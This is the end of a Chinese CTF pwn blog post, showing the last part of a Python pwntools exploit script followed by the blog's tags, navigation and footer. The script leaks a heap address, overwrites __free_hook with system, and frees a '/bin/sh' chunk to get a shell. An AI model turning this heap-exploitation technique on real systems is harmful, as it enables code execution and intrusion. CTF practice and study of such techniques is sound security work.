<span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    add<span class="token punctuation">(</span>i <span class="token operator">+</span> <span class="token number">4</span><span class="token punctuation">,</span> <span class="token string">b'a'</span><span class="token punctuation">)</span>

delete<span class="token punctuation">(</span><span class="token number">10</span><span class="token punctuation">)</span>
delete<span class="token punctuation">(</span><span class="token number">11</span><span class="token punctuation">)</span>

out<span class="token punctuation">(</span><span class="token punctuation">)</span>
show_db<span class="token punctuation">(</span><span class="token punctuation">)</span>

r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b'a'</span> <span class="token operator">*</span> <span class="token number">8</span> <span class="token operator">+</span> <span class="token string">b'\n'</span> <span class="token operator">+</span> <span class="token string">b'\t'</span><span class="token punctuation">)</span>
heap <span class="token operator">=</span> u64<span class="token punctuation">(</span>r<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">6</span><span class="token punctuation">)</span><span class="token punctuation">.</span>ljust<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">,</span> <span class="token string">b'\x00'</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

edit_db<span class="token punctuation">(</span>p64<span class="token punctuation">(</span>heap<span class="token punctuation">)</span><span class="token punctuation">,</span> p64<span class="token punctuation">(</span>free_hook <span class="token operator">-</span> <span class="token number">0x88</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">b'a'</span> <span class="token operator">*</span> <span class="token number">0x88</span><span class="token punctuation">)</span>

add_db<span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">,</span> <span class="token string">b'a'</span> <span class="token operator">*</span> <span class="token number">0x90</span><span class="token punctuation">)</span>
add_db<span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">,</span> <span class="token string">b'a'</span> <span class="token operator">*</span> <span class="token number">0x88</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>system<span class="token punctuation">)</span><span class="token punctuation">)</span>

add_db<span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">,</span> <span class="token string">b'/bin/sh\x00'</span><span class="token punctuation">)</span>
delete_db<span class="token punctuation">(</span><span class="token string">b'/bin/sh\x00'</span><span class="token punctuation">)</span>

r<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>


                
            </div>
            <hr/>

            



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/heap/">
                                    <span class="chip bg-color">heap</span>
                                </a>
                            
                                <a href="/tags/oob/">
                                    <span class="chip bg-color">oob</span>
                                </a>
                            
                                <a href="/tags/envp/">
                                    <span class="chip bg-color">envp</span>
                                </a>
                            
                                <a href="/tags/tls/">
                                    <span class="chip bg-color">tls</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2023/08/10/2023-syctf-pwn-fu-xian/2023syctf-computer-fu-xian/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/Steel%20Gray.jpg" class="responsive-img" alt="2023-syctf-pwn复现">
                        
                        <span class="card-title">2023-syctf-pwn复现</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            2023 syctf pwn部分题复现
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2023-08-10
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/pwn/" class="post-category">
                                    pwn
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/heap/">
                        <span class="chip bg-color">heap</span>
                    </a>
                    
                    <a href="/tags/%E9%9D%9E%E6%A0%88%E4%B8%8A%E7%9A%84%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2/">
                        <span class="chip bg-color">非栈上的格式化字符串</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2023/07/12/leetcode-shua-ti-chi-xu-geng-xin/leetcode-shua-ti-chi-xu-geng-xin/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/Steel%20Gray.jpg" class="responsive-img" alt="leetcode刷题（持续更新)">
                        
                        <span class="card-title">leetcode刷题（持续更新)</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            leetcode刷题记录
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2023-07-12
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E7%AE%97%E6%B3%95/" class="post-category">
                                    算法
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E7%AE%97%E6%B3%95/">
                        <span class="chip bg-color">算法</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
    <div class="container row center-align" style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2024</span>
            
            <span id="year">2019</span>
            <a href="/about" target="_blank">StarrySky</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">106.9k</span>&nbsp;字
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/starrysky1004" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:starrysky20041005@gmail.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=2726736810" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 2726736810" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>









    <a href="https://space.bilibili.com/85923475" class="tooltipped" target="_blank" data-tooltip="关注我的bilibili" data-position="top" data-delay="50">
        <i class="fas fa-video"></i>
    </a>
</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

	
    
    <script type="text/javascript" color="0,0,255"
        pointColor="0,0,255" opacity='0.7'
        zIndex="-1" count="99"
        src="/libs/background/canvas-nest.js"></script>
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":260,"height":300},"mobile":{"show":true},"log":false});</script></body>

</html>
